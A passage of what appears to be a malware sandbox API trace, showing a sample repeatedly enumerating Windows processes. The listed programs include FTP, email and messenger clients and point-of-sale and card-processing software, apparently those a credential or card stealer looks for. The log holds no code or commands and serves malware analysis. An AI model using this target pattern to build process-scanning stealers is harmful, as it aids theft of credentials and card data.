th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0240.682] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0240.733] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0240.735] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0240.736] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0240.738] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0240.739] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0240.741] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0240.742] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0240.744] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0240.745] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0240.750] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0240.751] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0240.753] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0240.754] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0240.756] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0240.757] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0240.759] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0240.760] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0240.762] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0240.766] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0240.768] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0240.770] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0240.772] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0240.773] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0240.775] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0240.777] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0240.795] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0240.797] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0240.799] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0240.800] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0240.802] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0240.804] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0240.806] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0240.811] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0240.813] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0240.815] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0240.816] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0240.818] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0240.820] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0240.821] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0240.823] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0240.828] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0240.830] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0240.831] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0240.833] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0240.834] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0240.836] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0240.838] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0240.839] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0240.892] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0240.894] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0240.895] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0240.897] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0240.899] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0240.900] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0240.902] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.907] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.909] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.910] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.912] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0240.913] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.915] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0240.917] CloseHandle (hObject=0x17b0) returned 1 [0240.917] Sleep (dwMilliseconds=0x64) [0241.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0241.062] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.063] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0241.065] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0241.066] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.068] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0241.069] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.071] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0241.072] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0241.074] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.078] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.079] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.081] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.082] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.084] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.085] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.087] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.088] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.090] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.140] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.141] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0241.143] Process32Next (in: 